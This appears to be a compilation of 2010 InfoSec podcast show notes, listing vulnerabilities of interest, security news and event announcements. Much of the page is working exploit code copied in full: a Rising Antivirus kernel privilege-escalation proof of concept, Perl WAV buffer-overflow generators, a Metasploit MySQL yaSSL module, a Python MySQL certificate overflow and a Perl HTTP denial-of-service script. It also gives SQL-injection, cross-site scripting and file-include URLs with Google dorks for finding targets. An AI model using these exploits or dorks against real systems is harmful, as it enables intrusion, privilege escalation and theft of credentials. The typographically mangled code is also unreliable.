Vulnerabilities of Interest:

1. FUSE is subject to a race-condition vulnerability. Local attackers can exploit this issue to cause a denial of service via symlink attacks involving FUSE shares belonging to privileged user. NOTE: Successful exploitation of the issue requires the attacker being a member of the ‘fuse’ group. This can be exploited using readily available tools.
2. Samba is subject to a local privilege-escalation vulnerability in the ‘mount.cifs’ utility. Local attackers can exploit this issue to gain elevated privileges on affected computers. This can be exploited using readily available tools.
3. The ‘com_ccnewsletter’ component for Joomla! is subject to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input data. An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. Example URL: http://www.sample.com/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00 Google Dork: inurl: index.php?option=com_ccnewsletter
4. Rising Antivirus is subject to multiple local privilege-escalation vulnerabilities that affect various drivers. An attacker can exploit these issues to execute arbitrary code with elevated privileges, facilitating a complete compromise of the affected computer. Rising Antivirus 2008 and Rising Antivirus 2009 are vulnerable.  Exploit code is available:
   // Rising0day.cpp : Defines the entry point for the console application.
   //
   #include “stdafx.h”
   #include “windows.h”
   enum { SystemModuleInformation = 11 };
   typedef struct {
   ULONG Unknown1;
   ULONG Unknown2;
   PVOID Base;
   ULONG Size;
   ULONG Flags;
   USHORT Index;
   USHORT NameLength;
   USHORT LoadCount;
   USHORT PathLength;
   CHAR ImageName[256];
   } SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
   typedef struct {
   ULONG Count;
   SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
   } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
   HANDLE g_RsGdiHandle = 0 ;
   void __stdcall WriteKVM(PVOID Address , ULONG Value)
   {
   ULONG ColorValue = Value ;
   ULONG btr ;
   ULONG ColorBuffer = 0 ;

   DeviceIoControl(g_RsGdiHandle ,
   0x83003C0B,
   &ColorValue ,
   sizeof(ULONG),
   &ColorBuffer ,
   sizeof(ULONG),
   &btr ,
   0
   );
   DeviceIoControl(g_RsGdiHandle ,
   0x83003C0B,
   &ColorValue ,
   sizeof(ULONG),
   Address ,
   sizeof(ULONG),
   &btr ,
   0
   );
   return ;
   }
   void AddCallGate()
   {
   ULONG Gdt_Addr;
   ULONG CallGateData[0x4];
   ULONG Icount;
   __asm
   {
   push edx
   sgdt [esp-2]
   pop edx
   mov Gdt_Addr , edx
   }
   __asm
   {

   push 0xc3
   push Gdt_Addr
   call WriteKVM
   mov eax,Gdt_Addr
   mov word ptr[CallGateData],ax
   shr eax,16
   mov word ptr[CallGateData+6],ax
   mov dword ptr[CallGateData+2],0x0ec0003e8
   mov dword ptr[CallGateData+8],0x0000ffff
   mov dword ptr[CallGateData+12],0x00cf9a00
   xor eax,eax
   LoopWrite:
   mov edi,dword ptr CallGateData[eax]

   push edi
   mov edi,Gdt_Addr
   add edi,0x3e0
   add edi,eax
   push edi
   mov Icount,eax
   call WriteKVM
   mov eax,Icount
   add eax , 0×4
   cmp eax,0×10
   jnz LoopWrite
   }

   return ;
   }

   void IntoR0(PVOID function)
   {
   WORD Callgt[3];
   Callgt[0] = 0;
   Callgt[1] = 0;
   Callgt[2] = 0x3e3;
   __asm
   {
   call fword ptr[Callgt]
   mov eax,esp
   mov esp,[esp+4]
   push eax
   call function
   pop esp
   push offset ring3Ret
   retf
   ring3Ret:
   nop
   }
   return ;

   }
   #pragma pack(1)
   typedef struct _IDTR
   {
   SHORT IDTLimit;
   UINT IDTBase;
   }IDTR,
   *PIDTR,
   **PPIDTR;
   #pragma pack()
   ULONG g_RealSSDT = 0 ;
   ULONG ServiceNum = 0 ;
   ULONG OrgService [0x1000] ;
   ULONG RvaToOffset(IMAGE_NT_HEADERS *NT, ULONG Rva)
   {
   ULONG Offset = Rva, Limit;
   IMAGE_SECTION_HEADER *Img;
   WORD i;

   Img = IMAGE_FIRST_SECTION(NT);

   if (Rva < Img->PointerToRawData)
   return Rva;

   for (i = 0; i < NT->FileHeader.NumberOfSections; i++)
   {
   if (Img[i].SizeOfRawData)
   Limit = Img[i].SizeOfRawData;
   else
   Limit = Img[i].Misc.VirtualSize;

   if (Rva >= Img[i].VirtualAddress &&
   Rva < (Img[i].VirtualAddress + Limit))
   {
   if (Img[i].PointerToRawData != 0)
   {
   Offset -= Img[i].VirtualAddress;
   Offset += Img[i].PointerToRawData;
   }

   return Offset;
   }
   }

   return 0;
   }
   #define ibaseDD *(PDWORD)&ibase
   DWORD GetHeaders(PCHAR ibase, PIMAGE_FILE_HEADER *pfh, PIMAGE_OPTIONAL_HEADER *poh, PIMAGE_SECTION_HEADER *psh)
   {
   PIMAGE_DOS_HEADER mzhead=(PIMAGE_DOS_HEADER)ibase;
   if ((mzhead->e_magic!=IMAGE_DOS_SIGNATURE)||(ibaseDD[mzhead->e_lfanew]!=IMAGE_NT_SIGNATURE)) return FALSE;
   *pfh=(PIMAGE_FILE_HEADER)&ibase[mzhead->e_lfanew];
   if (((PIMAGE_NT_HEADERS)*pfh)->Signature!=IMAGE_NT_SIGNATURE) return FALSE;
   *pfh=(PIMAGE_FILE_HEADER)((PBYTE)*pfh+sizeof(IMAGE_NT_SIGNATURE));
   *poh=(PIMAGE_OPTIONAL_HEADER)((PBYTE)*pfh+sizeof(IMAGE_FILE_HEADER));
   if ((*poh)->Magic!=IMAGE_NT_OPTIONAL_HDR32_MAGIC) return FALSE;
   *psh=(PIMAGE_SECTION_HEADER)((PBYTE)*poh+sizeof(IMAGE_OPTIONAL_HEADER));
   return TRUE;
   }
   typedef struct {
   WORD offset:12;
   WORD type:4;
   } IMAGE_FIXUP_ENTRY, *PIMAGE_FIXUP_ENTRY;
   #define RVATOVA(base,offset) ((PVOID)((DWORD)(base)+(DWORD)(offset)))
   DWORD FindKiServiceTable(HMODULE hModule,DWORD dwKSDT , PULONG ImageBase)
   {
   PIMAGE_FILE_HEADER pfh;
   PIMAGE_OPTIONAL_HEADER poh;
   PIMAGE_SECTION_HEADER psh;
   PIMAGE_BASE_RELOCATION pbr;
   PIMAGE_FIXUP_ENTRY pfe;

   DWORD dwFixups=0,i,dwPointerRva,dwPointsToRva,dwKiServiceTable;
   BOOL bFirstChunk;

   GetHeaders((PCHAR)hModule,&pfh,&poh,&psh);

   if ((poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress) &&
   (!((pfh->Characteristics)&IMAGE_FILE_RELOCS_STRIPPED))) {

   pbr=(PIMAGE_BASE_RELOCATION)RVATOVA(poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress,hModule);
   bFirstChunk=TRUE;
   while (bFirstChunk || pbr->VirtualAddress) {
   bFirstChunk=FALSE;

   pfe=(PIMAGE_FIXUP_ENTRY)((DWORD)pbr+sizeof(IMAGE_BASE_RELOCATION));

   for (i=0;i<(pbr->SizeOfBlock-sizeof(IMAGE_BASE_RELOCATION))>>1;i++,pfe++) {
   if (pfe->type==IMAGE_REL_BASED_HIGHLOW) {
   dwFixups++;
   dwPointerRva=pbr->VirtualAddress+pfe->offset;
   dwPointsToRva=*(PDWORD)((DWORD)hModule+dwPointerRva)-(DWORD)poh->ImageBase;

   if (dwPointsToRva==dwKSDT)
   {
   if (*(PWORD)((DWORD)hModule+dwPointerRva-2)==0x05c7)
   {
   dwKiServiceTable=*(PDWORD)((DWORD)hModule+dwPointerRva+4)-poh->ImageBase;
   *ImageBase = poh->ImageBase;
   return dwKiServiceTable;
   }
   }

   }
   }
   *(PDWORD)&pbr+=pbr->SizeOfBlock;
   }
   }

   return 0;
   }
   DWORD CR0Reg ;
   ULONG realssdt ;
   void InKerneProc()
   {
   __asm
   {
   cli
   mov eax, cr0
   mov CR0Reg,eax
   and eax,0xFFFEFFFF
   mov cr0, eax
   }
   int i;
   for (i = 0; i < (int)ServiceNum; i++)
   {
   *(ULONG*)(*(ULONG*)realssdt + i * sizeof(ULONG)) = OrgService[i];
   }
   __asm
   {
   mov eax, CR0Reg
   mov cr0, eax
   sti
   }

   }
   int main(int argc, char* argv[])
   {
   printf(“Rising AntiVirus 2008 ~ 2010 \n”
   “Local Privilege Escalation Vulnerability Proof Of Concept Exploit\n 2010-1-27\n”);

   g_RsGdiHandle = CreateFile(“\\\\.\\RSNTGDI” ,
   0,
   FILE_SHARE_READ | FILE_SHARE_WRITE ,
   0,
   OPEN_EXISTING , 0 , 0 );
   if (g_RsGdiHandle == INVALID_HANDLE_VALUE)
   {
   return 0 ;
   }

   SYSTEM_MODULE_INFORMATION ModuleInfo ;

   // Learn the loaded kernel (e.g. NTKRNLPA vs NTOSKRNL), and it’s base address

   HMODULE hlib = GetModuleHandle(“ntdll.dll”);
   PVOID pNtQuerySystemInformation = GetProcAddress(hlib , “NtQuerySystemInformation”);
   ULONG infosize = sizeof(ModuleInfo);

   __asm
   {
   push 0
   push infosize
   lea eax , ModuleInfo
   push eax
   push 11
   call pNtQuerySystemInformation
   }

   HMODULE KernelHandle ;
   LPCSTR ntosname = (LPCSTR)((ULONG)ModuleInfo.Module[0].ImageName + ModuleInfo.Module[0].PathLength);

   // Load the kernel image specified
   KernelHandle = LoadLibrary(ntosname);
   if (KernelHandle == 0 )
   {
   return 0 ;
   }

   ULONG KeSSDT = (ULONG)GetProcAddress(KernelHandle , “KeServiceDescriptorTable”);

   if (KeSSDT == 0 )
   {
   return 0 ;
   }
   ULONG ImageBase = 0 ;
   ULONG KiSSDT = FindKiServiceTable(KernelHandle , KeSSDT – (ULONG)KernelHandle , &ImageBase);
   if (KiSSDT == 0 )
   {
   return 0 ;
   }
   KiSSDT += (ULONG)KernelHandle;
   ServiceNum = 0x11c ;
   ULONG i ;

   for (i = 0 ; i < ServiceNum ; i ++)
   {
   OrgService[i] = *(ULONG*)(KiSSDT + i * sizeof(ULONG)) + (ULONG)ModuleInfo.Module[0].Base – ImageBase;
   }

   realssdt = KeSSDT – (ULONG)KernelHandle + (ULONG)ModuleInfo.Module[0].Base;

   SetThreadAffinityMask(GetCurrentThread () , 0 ) ;

   AddCallGate();
   IntoR0(InKerneProc);
   return 0;
   }

5. Discuz! is subject to an cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.  An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.  Discuz! 6.0.0 is vulnerable; other versions may also be affected. Example URL: http://www.sample.com/bbs/viewthread.php?tid=”&gt;&gt;&lt;script&gt;alert(HACKED BY FATAL ERROR)&lt;/script&gt;&lt;marquee&gt;&lt;h1&gt;XSS By Fatal Error&lt;/h1&gt;&lt;/marquee&gt;  Google Dork: inurl: /bbs/viewthread.php?
6. KOL Wave IOX 1.04 .wav is subject to a local buffer overflow because the application fails to properly perform adequate bounds checks.  Exploit Code is available:
   #!/usr/bin/perl
   #########################################################
   ## Usage–>>file created–>>load file–>>b00m.wav
   >>>BOOM
   #########################################################

   print “#####################################################n”;
   print “[!] KOL WaveIOX 1.04 (.wav) Local Buffer Overflow PoCn”;
   print “n”;
   print “[!] Author: cr4wl3rn”;
   print “[!] Mail: cr4wl3r[!]linuxmail.orgn”;
   print “#####################################################n”;

   my $boom = “http://”.”x41″ x 1337;
   my $filename = “b00m.wav”;
   open (FILE,”>$filename”);
   print FILE “$boom”;
   print “nFile successfully created!n”;

7. KOL Wave Player 1.0 s subject to a local buffer overflow because the application fails to properly perform adequate bounds checks.  Exploit Code is available:
   #!/usr/bin/perl
   #########################################################
   ## Usage–>>file created–>>load file–>>b00m.wav
   >>>BOOM
   #########################################################

   print “#####################################################n”;
   print “[!] KOL Wave Player 1.0 (.wav) Local Buffer Overflow
   PoCn”;
   print “n”;
   print “[!] Author: cr4wl3rn”;
   print “[!] Mail: cr4wl3r[!]linuxmail.orgn”;
   print “#####################################################n”;

   my $boom = “http://”.”x41″ x 1337;
   my $filename = “b00m.wav”;
   open (FILE,”>$filename”);
   print FILE “$boom”;
   print “nFile successfully created!n”;

News Items of Interest:

News item 1:  http://www.scmagazineus.com/popularity-of-apple-devices-draws-malware-report/article/162331/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+SCMagazineNews+%28SC+Magazine+News%29
Amid speculation that Apple is set to introduce its tablet device tomorrow at a press event in California, a discussion of the security implications will not likely be a part of the hoopla. While the device is already being touted as a game-changer in the publishing industry, reportedly introducing a new digital platform with a 10-inch screen for the delivery of newspaper and magazine content, what’s likely to follow within months of the debut, if history is any precedent, is a new wave of malware targeting the device. Users tuning in for their daily news feed or perusing copies of their favorite magazines may become victims of new iterations of malware likely intended to make off with their passwords and personal information to then be offered for sale in the nether regions of cyberspace.
.
News item 2:http://www.pcadvisor.co.uk/news/index.cfm?RSS&NewsID=3211248
A bogus IQ test program or through an infected website, Zimuse fills the first 50Kb MBR of each disk with zeroes, rendering  A virus that was created as a prank targetting an off-road Slovakian motorcycle club is causing an issue for web users across the world.  Security company ESET said the Windows-borne ‘Zimuse’ is a retro oddity because it attacks a hard disk master boot record (MBR) of any attached drive its finds, a technique common in viruses from nearly 20 years ago.  As with viruses of old, its spread is aided by its ability to infect the modern equivalent of floppy disks, USB sticks.
News item 3: http://www.v3.co.uk/v3/news/2256845/cybercrime-taken-seriously

Cyber crime is not being treated properly or taken sufficiently seriously by the police, according to a new study from the University of Leicester.

The study analysed the policing of the internet, and raised a number of concerns about police attitudes to the growing menace. Public Policing and Internet Crime, written by Professor Yvonne Jewkes of Leicester’s Department of Criminology, highlighted a general unwillingness to investigate cyber crimes, and warned that even when they are investigated, it is rarely through co-operation between different organisations or across geographical boundaries.
News item 4: http://nmap.org
Nmap 5.21 released.  Fixed an error that occurred when UDP scan was combined with version scan. UDP ports would appear in the state “unknown” at the end of the scan, and in some cases an assertion failure would be raised. This was an unintended side effect of the memory use reduction changes in 5.20.

Technical Segment: http://www.myharddrivedied.com/sans.html
Presentation:  http://www.myharddrivedied.com/diy-data-recovery.pdf

InfoSec Podcast Episode 56 for January 28, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.
Announcements:

FORENSICS-606: Drive and Data Recovery Forensics (Canceled)

Louisville OWASP Chapter – Fourth Meeting, Friday January 29th, 2010

Please Note:  RSVP Required! The meeting location this quarter has a capacity of 40 persons.  Please send your RSVP as soon as possible to ensure a seat and lunch.  We apologize for any inconvenience this may cause and are seeking a larger venue for future meetings.

To RSVP: Just send a reply to brian.r.blankenship@gmail.com and indicate how many are coming.

Date/Time: January 29th, 11:30 – 1:00PM
Location: MetroSafe Building, 410 S. Fifth Street. (there is a parking lot across the street, and a parking garage 1/2 block away).

Lunch is being provided by Imperva and Accuvant.

Speaker: Rafal Los will be discussing Flash and Web 2.0 security (see bio below)

“Rafal Los, Security Specialist with Hewlett-Packard’s Application Security Center  (ASC), is an industry veteran who has worked in a variety of security positions—  from consultant to Information Security Officer in the Fortune 100— within some of  the most demanding business environments.  Rafal’s unique blend of technical  expertise and business knowledge enable him to teach audiences about security  techniques, programs and processes that they can both understand strategically,  and realistically apply.  He has extensive experience in security testing, risk  analysis and management, penetration testing and architecture and policy.  Previous successes include building and implementing a successful web  application security program for one of the largest and most diverse companies in  the world.”
Vulnerabilities of Interest:

1. yaSSL is subject to multiple remote buffer-overflow vulnerabilities.Successfully exploiting these issues allows remote attackers to execute arbitrary code in the context of applications using the library. Failed attacks will cause denial-of-service conditions. yaSSL 1.7.5 is vulnerable to these issues; other versions are also likely to be affected.  Proof-of-concept and exploit code are available:
   ##
   # $Id: mysql_yassl_hello.rb 8242 2010-01-26 20:12:13Z jduck $
   ##

   ##
   # This file is part of the Metasploit Framework and may be subject to
   # redistribution and commercial restrictions. Please see the Metasploit
   # Framework web site for more information on licensing and terms of use.
   # http://metasploit.com/framework/
   ##

   require ‘msf/core’

   class Metasploit3 < Msf::Exploit::Remote
   Rank = AverageRanking

   include Msf::Exploit::Remote::Tcp

   def initialize(info = {})
   super(update_info(info,
   ‘Name’ => ‘MySQL yaSSL SSL Hello Message Buffer Overflow’,
   ‘Description’ => %q{
   This module exploits a stack overflow in the yaSSL (1.7.5 and earlier)
   implementation bundled with MySQL <= 6.0. By sending a specially crafted
   Hello packet, an attacker may be able to execute arbitrary code.
   },
   ‘Author’ => [ 'MC' ],
   ‘License’ => MSF_LICENSE,
   ‘Version’ => ‘$Revision: 8242 $’,
   ‘References’ =>
   [
   [ 'CVE', '2008-0226' ],
   [ 'OSVDB', '41195'],
   [ 'BID', '27140' ],
   ],
   ‘Privileged’ => true,
   ‘DefaultOptions’ =>
   {
   ‘EXITFUNC’ => ‘thread’,
   },
   ‘Payload’ =>
   {
   ‘Space’ => 600,
   ‘BadChars’ => “\x00\x20\x0a\x0d\x2f\x2b\x0b\x5c”,
   ‘StackAdjustment’ => -3500,
   ‘PrependEncoder’ => “\x81\xc4\x54\xf2\xff\xff”,
   },
   ‘Platform’ => ‘win’,
   ‘Targets’ =>
   [
   [ 'MySQL 5.0.45-community-nt', { 'Ret' => 0x008b9d45 } ],
   [ 'MySQL 5.1.22-rc-community', { 'Ret' => 0x008b04c9 } ],
   ],
   ‘DefaultTarget’ => 0,
   ‘DisclosureDate’ => ‘Jan 4 2008′))

   register_options([ Opt::RPORT(3306) ], self)
   end

   def exploit
   connect

   sock.get_once

   req_uno = [0x01000020].pack(‘V’)

   req_dos = [0x00008daa].pack(‘V’) + [0x40000000].pack(‘V’)
   req_dos << [0x00000008].pack(‘V’) + [0x00000000].pack(‘V’)
   req_dos << [0x00000000].pack(‘V’) + [0x00000000].pack(‘V’)
   req_dos << [0x00000000].pack(‘V’) + [0x00000000].pack(‘V’)
   req_dos << [0x03010000].pack(‘V’) + [0x00000001].pack(‘V’)
   req_dos << “\x00\x0F\xFF” + rand_text_alphanumeric(3917 – payload.encoded.length)
   req_dos << make_nops(100) + payload.encoded + [target.ret].pack(‘V’)
   req_dos << make_nops(16) + [0xe8, -650].pack(‘CV’) + rand_text_alphanumeric(1024)

   print_status(“Trying target #{target.name}…”)

   sock.put(req_uno)
   sock.put(req_dos)

   handler
   disconnect
   end

   end

2. MySQL compiled with yaSSL is subject to a remote stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. MySQL 5.5.0-ms2 is vulnerable when compiled with yaSSL; other versions may also be affected.
   #!/usr/bin/env python
   #
   # Use this code at your own risk. Never run it against a production system.
   #
   # THE SOFTWARE IS PROVIDED “AS IS” AND THE AUTHOR DISCLAIMS ALL WARRANTIES
   # WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
   # MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
   # ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
   # WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
   # ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
   # OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.

   “”"
   Usage: mysql_overflo1.py localhost

   MySQL yassl cert parsing stack overflow

   Debug session on 5.5.0-m2

   suse11:~ # gdb -q
   (gdb) att 5542
   Attaching to process 5542
   Reading symbols from /var/mysql/libexec/mysqld…cdone.
   …
   0xffffe430 in __kernel_vsyscall ()
   (gdb) c
   Continuing.

   Program received signal SIGSEGV, Segmentation fault.
   [Switching to Thread 0xb6bbab90 (LWP 5545)]
   0×41424344 in ?? ()
   (gdb)

   “”"
   import os
   import getopt
   import sys
   import socket
   import time
   import telnetlib
   import struct
   import base64
   import random

   class theexploit:
   def __init__(self,host):
   self.host = host
   self.port = 3306

   def gettcpsock(self):
   sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
   return sock

   def int2berlen(self,i):
   e=self.int2ber(i, signed=0)
   if i <= 127:
   return e
   else:
   l=len(e)
   return chr(0×80|l) + e

   def int2ber(self,i, signed=1):
   encoded=”
   while ((signed and (i>127 or i<-128))
   or (not signed and (i>255))):
   encoded=chr(i%256)+encoded
   i=i>>8
   encoded=chr(i%256)+encoded
   return encoded

   def big_endian_24(self, length):
   l1 = (length & 0xff0000) >> 16;
   l2 = (length & 0xff00) >> 8;
   l3 = length & 0xff;
   size = chr(l1) + chr(l2) + chr(l3)
   return size

   def attack_mysql(self):
   sock = self.gettcpsock()
   sock.connect((self.host, self.port))
   #sock.set_timeout(30.0)

   print “press any key”
   sys.stdin.readline()

   s=sock.recv(8000)
   print s

   s =”\x20\x00\x00\x01\x85\xae\x03\x00\x00\x00\x00\x01\x08\x00\x00\x00″
   s+=”\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00″
   s+=”\x00\x00\x00\x00″
   s+=”\x16\x03\x01\x00\x60\x01\x00\x00\x5c\x03\x01\x4a\x92\xce\xd1\xe1″
   s+=”\xab\x48\x51\xc8\x49\xa3\x5e\x97\x1a\xea\xc2\x99\x82\x33\x42\xd5″
   s+=”\x14\xbc\x05\x64\xdc\xb5\x48\xbd\x4c\x11\x55\x00\x00\x34\x00\x39″
   s+=”\x00\x38\x00\x35\x00\x16\x00\x13\x00\x0a\x00\x33\x00\x32\x00\x2f”
   s+=”\x00\x66\x00\x05\x00\x04\x00\x63\x00\x62\x00\x61\x00\x15\x00\x12″
   s+=”\x00\x09\x00\x65\x00\x64\x00\x60\x00\x14\x00\x11\x00\x08\x00\x06″
   s+=”\x00\x03\x02\x01\x00″

   sock.sendall(s)
   print “Sent SSL_CLIENT_HELLO”

   sock.sendall(self.make_overflow())
   print “Sent SSL_CLIENT_CERTIFICATE”
   sock.close()

   def run(self):
   self.attack_mysql()
   return 0

   def make_overflow(self):
   retaddr=0×41424344
   cn=”"
   cn += “\x00″* 1062
   cn+=struct.pack (“<L”,retaddr)*6
   #cn += “\x40″ * 100
   #cn += “\xcc”*100
   #cn += “\x40″ * 100

   cert = “\x2a\x86\x00\x84″ + struct.pack(“>L”,len(cn)) + cn

   cert = “\x30\x82\x01\x01\x31\x82\x01\x01\x30\x82\x01\x01\x06\x82\x00\x02″ + cert

   cert =”\xa0\x03\x02\x01\x02\x02\x01\x00\x30\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x04\x05\x00″ + cert

   cert = “\x30″ + self.int2berlen(len(cert)) + cert
   cert = “\x30″ + self.int2berlen(len(cert)) + cert

   cert1 = self.big_endian_24(len(cert)) + cert
   certs = self.big_endian_24(len(cert1)) + cert1

   handshake = “\x0b” +  self.big_endian_24(len(certs)) + certs
   msg = “\x16\x03\x01″ + struct.pack(“>H”,len(handshake)) + handshake

   return msg

   if __name__==”__main__”:
   app = theexploit(sys.argv[1])
   app.run()

3. PostgreSQL is subject to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.  Attackers can exploit this issue to execute arbitrary code with elevated privileges or crash the affected application. PostgreSQL 8.0.23 is vulnerable; other versions may also be affected. Proof of concept is available: testdb=# select substring(B’10101010101010101010101010101010101010101010101′,33,-15);
4. VirtueMart is subject to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Example URLs:

   http://www.sample.com/[JOOMLA_PATH]/administrator/index.php?page=order.order_status_form&limitstart=0&keyword=&order_status_id=[SQL]&option=com_virtuemart

   http://www.sample.com/[JOOMLA_PATH]/administrator/index.php?page=order.order_status_form&limitstart=0&keyword=&order_status_id=-1%27+UNION+ALL+SELECT+1,username,password,@@version,database%28%29,6+FROM+jos_users%23&option=com_virtuemart

   http://www.sample.com/[JOOMLA_PATH]/1%27%20union%20all%20select%20@@version

5. MiFi 2352 is subject to an information-disclosure vulnerability that may expose sensitive information. Successful exploits will allow authenticated attackers to obtain passwords, which may aid in further attacks. MiFi 2352 access point firmware 11.47.17 is vulnerable; other versions may also be affected. Example URLs:

   http://www.sample.com/config.xml.sav

   http://www.sample.com/config.xml.save

6. e107 is subject to an unspecified remote vulnerability. Very little is known about this issue. Versions prior to e107 0.7.17 are vulnerable.  This issue was exploited in an attack against the vendor’s website. Currently we are not aware of any publicly available exploits.
7. phpYabs is subject to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible. phpYabs 0.1.2 is vulnerable; other versions may also be affected. Example URL: http://www.sample.com/phpyabs/moduli/libri/index.php?Azione=[SHELL] GoogleDork: inurl: phpyabs/moduli/libri/index.php
8. The JBDiary component for Joomla! is subject to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Example URLs:

   http://www.sample.com/?newyear=2011′+and+substring(@@version,1,1)=4%23&newmonth=01

   http://www.sample.com/?newyear=2011′+and+substring(@@version,1,1)=5%23&newmonth=01

   http://www.sample.com/?newyear=2011&newmonth=01′+and+substring(@@version,1,1)=4%23

   http://www.sample.com/?newyear=2011&newmonth=01′+and+substring(@@version,1,1)=5%23

News Items of Interest:

News item 1: http://www.businesswire.com/portal/site/topix/?ndmViewId=news_view&newsId=20100127005098&newsLang=en
An IT security expert and blogger claims to have successfully intercepted and compromised phone calls made using 12 commercially available mobile voice encryption products. PhoneCrypt from SecurStar was one of only three solutions that successfully blocked the attacks that were made using a simple wiretapping Trojan.

“Like most security breaches, Notrax went for the weakest link; he did not attempt to crack the encryption itself, but used simple wiretapping techniques”

Using a readily available wiretapping utility, costing as little as $100, as well as his own ‘homemade’ Trojan, the blogger – aka Notrax – was able to by-pass the encryption and eavesdrop by capturing conversations from the microphone and speaker in real time. By suppressing any rings, notifications or call logs, these attacks go completely undetected. And while Trojans can be installed manually by someone with access to the phone, they could equally be delivered via email, SMS or a mobile application.

Notrax describes his tests extensively at www.infosecurityguard.com with links to Youtube videos.
News item 2: http://www.newsfactor.com/story.xhtml?story_id=12200DUI6NKA&full_skip=1
In a move that could invigorate weak sales of Google’s Nexus One smartphone, Wal-Mart, the world’s largest retailer, appears ready to start selling the device. According to one online report, the cost could be as low as $99 — much lower than the subsidized $179 price from T-Mobile with a two-year plan.

News item 3: http://www.internetnews.com/security/article.php/3860871

Data breach incidents cost companies an average of $6.75 million each time, according to a new study released by security researcher The Ponemon Institute and PGP Corp., an e-mail and data encryption security software developer.

And while the study found that the total number of reported data breaches declined from 657 incidents in 2008 to 498 last year, the average cost inched up from $202 to $204 per customers record.

The firms’ joint U.S. Cost of Data Breach Study chronicles a wide range of cost factors, including the outlays for detection, escalation, notification and response along with legal, investigative and administrative expenses, customer defections, opportunity loss and reputation management.

The $6.75 million cost per incident was slightly higher than the $6.65 million enterprise clients shelled out in 2008. Those figures include the costs associated with customer support such as information hotlines and credit monitoring subscriptions.

Technical Segment: http://www.irongeek.com/xss-sql-injection-fuzzing-barcode-generator.php

InfoSec Podcast Episode 55 for January 27, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.
Announcements:
Community SANS Atlanta 2010 Spring Schedule has been posted.

SEC-606: Drive and Data Recovery Forensics    2/9/10 to 2/13/10
SEC-502: Perimeter Protection In-Depth    2/22/10 to 2/27/10
AUD-507: Auditing Networks, Perimeters, and Systems    3/15/10 to 3/20/10
MGT-512: SANS Security Leadership Essentials For Managers with Knowledge Compression    4/15/10 to 4/21/10
SEC-566: 20 Critical Security Controls – In Depth    5/17/10 to 5/21/10

Go online to register by going to the SANS website or call (301) 654-SANS(7267).

SANS 2010 Orlando, Fl. March 6 – 15, 2010 (http://www.sans.org/sans-2010/)

Vulnerabilities of Interest:

1. P2GChinchilla HTTP Server version 1.1.1 is subject to a remote denial of service.  Exploit code is availabe:

#!/usr/bin/perl
# File Name 2GChinchilla[TM] HTTP Server
# Vuln : Remote Denial Of Service Exploit
# Auther : Zer0 Thunder
# Msn : zer0_thunder@colombohackers.com
#
#
##==——>>
#
# Exploit Title: P2GChinchilla[TM] HTTP Server 1.1.1 Remote Denial Of
Service Exploit
# Date: 22/01/2010
# Author: Zer0 Thunder
# Site : http://www.proggies2go.org/pages/p2gChinchilla.html?ref=PAD
# Software Link:

http://www.proggies2go.org/pages/p2gChinchilla/p2gChinchilla.rar

# Version: v 1.1.1
# Tested on: Server runs on Windows XP Sp2 /Test on Remote Location
##==——>>
use IO::Socket::INET;
$ip = $ARGV[0];
$port = $ARGV[1];
if (! defined $ARGV[0])
{
print
“t+================================================================+n&
quot;;
print “t+ — P2GChinchilla[TM] HTTP Server 1.1.1 Denial Of Service
—+n”;
print “t+ — Author :Zer0 Thunder
—+n”;
print “t+ — DATE: :[24/01/2010]
—+n”;
print “t+ — ————————————————
—+n”;
print “t+ — Usage :perl exploit.pl [Host/Remote IP] [Port]
—+n”;
print “t+ —
—+n”;
print
“t+================================================================+n&
quot;;
print “n”;
print ” Ex : exploit.pl localhost 50000n”; # P2GChinchilla
Default Port is 50000

exit;
}

print
“t+================================================================+n&
quot;;
print “t+ — P2GChinchilla[TM] HTTP Server 1.1.1 Denial Of Service
—+n”;
print “t+ — Author :Zer0 Thunder
—+n”;
print “t+ — DATE: :[24/01/2010]
—+n”;
print “t+ — ————————————————
—+n”;
print “t+ — Usage :perl exploit.pl [Host/Remote IP] [Port]
—+n”;
print “t+ —
—+n”;
print
“t+================================================================+n&
quot;;
